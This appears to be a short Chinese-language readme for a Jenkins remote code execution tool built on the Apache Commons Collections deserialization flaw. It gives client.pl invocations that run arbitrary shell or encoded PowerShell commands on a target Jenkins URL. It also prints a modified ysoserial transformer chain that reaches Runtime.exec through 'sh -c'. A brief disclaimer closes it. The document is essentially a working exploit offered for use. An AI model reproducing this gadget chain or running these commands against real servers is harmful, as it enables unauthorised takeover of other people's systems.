http://tools.changesec.com/Jenkins-CommonCollections-Exploit/
花时间学了一下 transformer,这个版本支持任意命令!
cpan IPC::Run
./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'
来个截图,
![截图] (https://raw.githubusercontent.com/CaledoniaProject/jenkins-cli-exploit/master/contrib/sample.jpg "Desktop screenshot")
官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection,
分别为,
CommonsCollections1Linux
CommonsCollections1Win
修改点,你懂的,
final String[] execArgs = new String[] { "sh", "-c", command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String[].class }, new Object[] {
execArgs }),
new ConstantTransformer(1) };
代码懒得上传了,直接用lib的就可以
Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.